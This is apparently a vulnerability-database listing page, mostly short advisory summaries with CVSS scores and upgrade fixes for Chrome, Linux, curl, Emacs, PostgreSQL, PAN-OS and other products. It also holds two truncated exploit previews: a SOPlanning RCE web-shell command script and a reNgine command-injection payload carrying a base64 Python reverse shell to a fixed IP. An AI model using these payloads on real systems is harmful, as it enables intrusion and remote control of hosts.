?day POC 漏洞数据库

Microsoft Edge Chromium: CVE-2023-1529 Out of bounds memory access in WebHID Severity 10 CVSS (AV:N/AC:L/Au:N/C:C/I:C/A:C) Published 03/21/2023 Created 03/27/2023 Added 03/27/2023 Modified 01/28/2025 Description Out of bounds memory access in WebHID in Google Chrome prior to 111.0.5563.110 allowed a remote attacker to potentially exploit heap corruption via a malicious HID device. (Chromium security severity: High) Solution(s) microsoft-edge-upgrade-latest References https://attackerkb.com/topics/cve-2023-1529 CVE - 2023-1529 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-1529

Google Chrome Vulnerability: CVE-2025-0998 Out of bounds memory access in V8 Severity 4 CVSS (AV:L/AC:M/Au:N/C:P/I:P/A:P) Published 02/13/2025 Created 02/14/2025 Added 02/13/2025 Modified 02/13/2025 Description Google Chrome Vulnerability: CVE-2025-0998 Out of bounds memory access in V8 Solution(s) google-chrome-upgrade-latest References https://attackerkb.com/topics/cve-2025-0998 CVE - 2025-0998

Ubuntu: (Multiple Advisories) (CVE-2024-42415): libgsf vulnerabilities Severity 7 CVSS (AV:L/AC:M/Au:N/C:C/I:C/A:C) Published 10/03/2024 Created 10/12/2024 Added 10/11/2024 Modified 01/28/2025 Description An integer overflow vulnerability exists in the Compound Document Binary File format parser of v1.14.52 of the GNOME Project G Structured File Library (libgsf). A specially crafted file can result in an integer overflow that allows for a heap-based buffer overflow when processing the sector allocation table. This can lead to arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability. Solution(s)…

Ubuntu: (Multiple Advisories) (CVE-2023-28617): Emacs vulnerability Severity 7 CVSS (AV:L/AC:M/Au:N/C:C/I:C/A:C) Published 03/19/2023 Created 05/05/2023 Added 04/10/2023 Modified 01/28/2025 Description org-babel-execute:latex in ob-latex.el in Org Mode through 9.6.1 for GNU Emacs allows attackers to execute arbitrary commands via a file name or directory name that contains shell metacharacters. Solution(s) ubuntu-pro-upgrade-emacs ubuntu-pro-upgrade-emacs-bin-common ubuntu-pro-upgrade-emacs-common ubuntu-pro-upgrade-emacs-el ubuntu-pro-upgrade-emacs24 ubuntu-pro-upgrade-emacs24-bin-common ubuntu-pro-upgrade-emacs24-common ubuntu-pro…

FreeBSD: VID-68958E18-ED94-11ED-9688-B42E991FC52E (CVE-2023-28636): glpi -- multiple vulnerabilities Severity 4 CVSS (AV:N/AC:M/Au:M/C:P/I:P/A:N) Published 03/20/2023 Created 05/17/2023 Added 05/16/2023 Modified 01/28/2025 Description GLPI is a free asset and IT management software package. Starting in version 0.60 and prior to versions 9.5.13 and 10.0.7, a vulnerability allows an administrator to create a malicious external link. This issue is fixed in versions 9.5.13 and 10.0.7. Solution(s) freebsd-upgrade-package-glpi References CVE-2023-28636

Oracle Linux: CVE-2023-27533: ELSA-2023-6679:curl security update (MODERATE) (Multiple Advisories) Severity 5 CVSS (AV:N/AC:L/Au:N/C:N/I:P/A:N) Published 03/20/2023 Created 07/26/2024 Added 07/22/2024 Modified 11/22/2024 Description A vulnerability in input validation exists in curl <8.0 during communication using the TELNET protocol may allow an attacker to pass on maliciously crafted user name and "telnet options" during server negotiation. The lack of proper input scrubbing allows an attacker to send content or perform option negotiation without the application's intent. This vulnerability could be exploited if a…

FreeBSD: VID-A4F8BB03-F52F-11ED-9859-080027083A05 (CVE-2023-28322): curl -- multiple vulnerabilities Severity 4 CVSS (AV:N/AC:M/Au:N/C:P/I:N/A:N) Published 03/21/2023 Created 05/23/2023 Added 05/20/2023 Modified 01/28/2025 Description Details for this vulnerability have not been published by NIST at this point. Descriptions from software vendor advisories for this issue are provided below. From VID-A4F8BB03-F52F-11ED-9859-080027083A05: Wei Chong Tan, Harry Sintonen, and Hiroki Kurosawa reports: This update fixes 4 security vulnerabilities: Medium CVE-2023-28319: UAF in SSH sha256 fingerprint check. Reported by Wei Chong Tan on 202…

# Exploit Title: SOPlanning 1.52.01 (Simple Online Planning Tool) - Remote Code Execution (RCE) (Authenticated) # Date: 6th October, 2024 # Exploit Author: Ardayfio Samuel Nii Aryee # Version: 1.52.01 # Tested on: Ubuntu import argparse import requests import random import string import urllib.parse def command_shell(exploit_url): commands = input("soplaning:~$ ") encoded_command = urllib.parse.quote_plus(commands) command_res = requests.get(f"{exploit_url}?cmd={encoded_command}") if command_res.status_code == 200: print(f"{command_res.text}") return print(f"Error: An erros occured while running command: {encoded_command}") def exp…

Google Chrome Vulnerability: CVE-2025-0997 Use after free in Navigation Severity 4 CVSS (AV:L/AC:M/Au:N/C:P/I:P/A:P) Published 02/13/2025 Created 02/14/2025 Added 02/13/2025 Modified 02/13/2025 Description Google Chrome Vulnerability: CVE-2025-0997 Use after free in Navigation Solution(s) google-chrome-upgrade-latest References https://attackerkb.com/topics/cve-2025-0997 CVE - 2025-0997

# Exploit Title: reNgine 2.2.0 - Command Injection (Authenticated) # Date: 2024-09-29 # Exploit Author: Caner Tercan # Vendor Homepage: https://rengine.wiki/ # Software Link: https://github.com/yogeshojha/rengine # Version: v2.2.0 # Tested on: macOS POC : 1. Login the Rengine Platform 2. Click the Scan Engine 3. Modify any Scan Engine 4. I modified nmap_cmd parameters on yml config 5. Finally, add a target in the targets section, select the scan engine you edited and start scanning. payload : 'nmap_cmd': 'echo "cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxvcyxwdHk7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTAuMjQ0LjE1MC42OSIsNjE2MTIpKT…

Debian: CVE-2025-24531: pam-pkcs11 -- security update Severity 4 CVSS (AV:L/AC:M/Au:N/C:P/I:P/A:P) Published 02/14/2025 Created 02/15/2025 Added 02/14/2025 Modified 02/14/2025 Description Possible Authentication Bypass in Error Situations Solution(s) debian-upgrade-pam-pkcs11 References https://attackerkb.com/topics/cve-2025-24531 CVE - 2025-24531 DSA-5864-1

Red Hat: CVE-2023-28164: CVE-2023-28164 Mozilla: URL being dragged from a removed cross-origin iframe into the same tab triggered navigation (Multiple Advisories) Severity 7 CVSS (AV:N/AC:M/Au:N/C:N/I:C/A:N) Published 03/20/2023 Created 03/22/2023 Added 03/21/2023 Modified 01/28/2025 Description Dragging a URL from a cross-origin iframe that was removed during the drag could have led to user confusion and website spoofing attacks. This vulnerability affects Firefox < 111, Firefox ESR < 102.9, and Thunderbird < 102.9. Solution(s) redhat-upgrade-firefox redhat-upgrade-firefox-debuginfo redhat-upgrade-firefox-debugsource redha…

Microsoft Office: CVE-2025-21397: Microsoft Office Remote Code Execution Vulnerability Severity 6 CVSS (AV:L/AC:M/Au:N/C:C/I:C/A:C) Published 02/11/2025 Created 02/12/2025 Added 02/11/2025 Modified 02/11/2025 Description Microsoft Office: CVE-2025-21397: Microsoft Office Remote Code Execution Vulnerability Solution(s) office-click-to-run-upgrade-latest References https://attackerkb.com/topics/cve-2025-21397 CVE - 2025-21397

PostgreSQL: CVE-2025-1094: PostgreSQL quoting APIs miss neutralizing quoting syntax in text that fails encoding validation Severity 8 CVSS (AV:N/AC:H/Au:N/C:C/I:C/A:C) Published 02/13/2025 Created 02/14/2025 Added 02/13/2025 Modified 02/14/2025 Description Improper neutralization of quoting syntax in PostgreSQL libpq functions PQescapeLiteral(), PQescapeIdentifier(), PQescapeString(), and PQescapeStringConn() allows a database input provider to achieve SQL injection in certain usage patterns. Specifically, SQL injection requires the application to use the function result to construct input to psql, the PostgreSQL interactive terminal. Similarly, i…

Debian: CVE-2023-25751: firefox-esr, thunderbird -- security update Severity 7 CVSS (AV:N/AC:M/Au:N/C:N/I:N/A:C) Published 03/17/2023 Created 03/17/2023 Added 03/17/2023 Modified 01/28/2025 Description Sometimes, when invalidating JIT code while following an iterator, the newly generated code could be overwritten incorrectly. This could lead to a potentially exploitable crash. This vulnerability affects Firefox < 111, Firefox ESR < 102.9, and Thunderbird < 102.9. Solution(s) debian-upgrade-firefox-esr debian-upgrade-thunderbird References https://attackerkb.com/topics/cve-2023-25751 CVE - 2023-25751 DSA-5374-1

FreeBSD: VID-79B1F4EE-860A-11EF-B2DC-CBCCBF25B7EA: gitea -- token missing access control for packages Severity 4 CVSS (AV:L/AC:M/Au:N/C:P/I:P/A:P) Published 10/06/2024 Created 10/12/2024 Added 10/11/2024 Modified 10/11/2024 Description Problem Description: Fix bug when a token is given public only Solution(s) freebsd-upgrade-package-gitea

Debian: CVE-2022-48424: linux -- security update Severity 7 CVSS (AV:L/AC:L/Au:S/C:C/I:C/A:C) Published 03/19/2023 Created 07/31/2024 Added 07/30/2024 Modified 01/28/2025 Description In the Linux kernel before 6.1.3, fs/ntfs3/inode.c does not validate the attribute name offset. An unhandled page fault may occur. Solution(s) debian-upgrade-linux References https://attackerkb.com/topics/cve-2022-48424 CVE - 2022-48424

Ivanti Pulse Connect Secure: February Security Advisory Ivanti Connect Secure (ICS),Ivanti Policy Secure (IPS) and Ivanti Secure Access Client (ISAC) (Multiple CVEs) Severity 4 CVSS (AV:L/AC:L/Au:M/C:C/I:N/A:N) Published 02/11/2025 Created 02/13/2025 Added 02/12/2025 Modified 02/12/2025 Description Cleartext storage of information in Ivanti Connect Secure before version 22.7R2.6 and Ivanti Policy Secure before version 22.7R1.3 allows a local unauthenticated attacker to read sensitive data. Solution(s) pulse-secure-pulse-connect-secure-upgrade-22_7r2_6 References https://attackerkb.com/topics/cve-2024-13843 CVE - 2024-13843…

Debian: CVE-2025-21694: linux -- security update Severity 4 CVSS (AV:L/AC:M/Au:N/C:P/I:P/A:P) Published 02/12/2025 Created 02/15/2025 Added 02/14/2025 Modified 02/14/2025 Description In the Linux kernel, the following vulnerability has been resolved: fs/proc: fix softlockup in __read_vmcore (part 2) Since commit 5cbcb62dddf5 ("fs/proc: fix softlockup in __read_vmcore") the number of softlockups in __read_vmcore at kdump time have gone down, but they still happen sometimes. In a memory constrained environment like the kdump image, a softlockup is not just a harmless message, but it can interfere with things like RCU freeing memory, causing the c…

Rocky Linux: CVE-2023-28617: emacs (Multiple Advisories) Severity 7 CVSS (AV:L/AC:M/Au:N/C:C/I:C/A:C) Published 03/19/2023 Created 03/07/2024 Added 03/05/2024 Modified 01/28/2025 Description org-babel-execute:latex in ob-latex.el in Org Mode through 9.6.1 for GNU Emacs allows attackers to execute arbitrary commands via a file name or directory name that contains shell metacharacters. Solution(s) rocky-upgrade-emacs rocky-upgrade-emacs-common rocky-upgrade-emacs-common-debuginfo rocky-upgrade-emacs-debuginfo rocky-upgrade-emacs-debugsource rocky-upgrade-emacs-lucid rocky-upgrade-emacs-lucid-debuginfo rocky-upgrade-emacs-nox rocky-upg…

Debian: CVE-2025-21697: linux -- security update Severity 4 CVSS (AV:L/AC:M/Au:N/C:P/I:P/A:P) Published 02/12/2025 Created 02/15/2025 Added 02/14/2025 Modified 02/14/2025 Description In the Linux kernel, the following vulnerability has been resolved: drm/v3d: Ensure job pointer is set to NULL after job completion After a job completes, the corresponding pointer in the device must be set to NULL. Failing to do so triggers a warning when unloading the driver, as it appears the job is still active. To prevent this, assign the job pointer to NULL after completing the job, indicating the job has finished. Solution(s) debian-upgrade-lin…

Microsoft Windows: CVE-2025-21418: Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability Severity 6 CVSS (AV:L/AC:L/Au:S/C:C/I:C/A:C) Published 02/11/2025 Created 02/12/2025 Added 02/11/2025 Modified 02/13/2025 Description Microsoft Windows: CVE-2025-21418: Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability Solution(s) microsoft-windows-windows_10-1507-kb5052040 microsoft-windows-windows_10-1607-kb5052006 microsoft-windows-windows_10-1809-kb5052000 microsoft-windows-windows_10-21h2-kb5051974 microsoft-windows-windows_10-22h2-kb5051974 microsoft-windows-windows_11-22h2-kb50…

FreeBSD: VID-F7CA4FF7-E53F-11EF-A845-B42E991FC52E (CVE-2025-1018): mozilla -- multiple vulnerabilities Severity 4 CVSS (AV:L/AC:M/Au:N/C:P/I:P/A:P) Published 02/04/2025 Created 02/11/2025 Added 02/08/2025 Modified 02/08/2025 Description The fullscreen notification is prematurely hidden when fullscreen is re-requested quickly by the user. This could have been leveraged to perform a potential spoofing attack. This vulnerability affects Firefox < 135 and Thunderbird < 135. Solution(s) freebsd-upgrade-package-mozilla References CVE-2025-1018

PAN-OS: Authentication Bypass in the Management Web Interface Severity 4 CVSS (AV:L/AC:M/Au:N/C:P/I:P/A:P) Published 02/12/2025 Created 02/14/2025 Added 02/13/2025 Modified 02/13/2025 Description An authentication bypass in the Palo Alto Networks PAN-OS software enables an unauthenticated attacker with network access to the management web interface to bypass the authentication otherwise required by the PAN-OS management web interface and invoke certain PHP scripts. While invoking these PHP scripts does not enable remote code execution, it can negatively impact integrity and confidentiality of PAN-OS. You can greatly reduce the risk of this issue by…

Alma Linux: CVE-2025-1014: Important: firefox security update (Multiple Advisories) Severity 4 CVSS (AV:L/AC:M/Au:N/C:P/I:P/A:P) Published 02/04/2025 Created 02/12/2025 Added 02/11/2025 Modified 02/13/2025 Description Certificate length was not properly checked when added to a certificate store. In practice only trusted data was processed. This vulnerability affects Firefox < 135, Firefox ESR < 128.7, Thunderbird < 128.7, and Thunderbird < 135. Solution(s) alma-upgrade-firefox alma-upgrade-firefox-x11 alma-upgrade-thunderbird References https://attackerkb.com/topics/cve-2025-1014 CVE - 2025-1014 https://erra…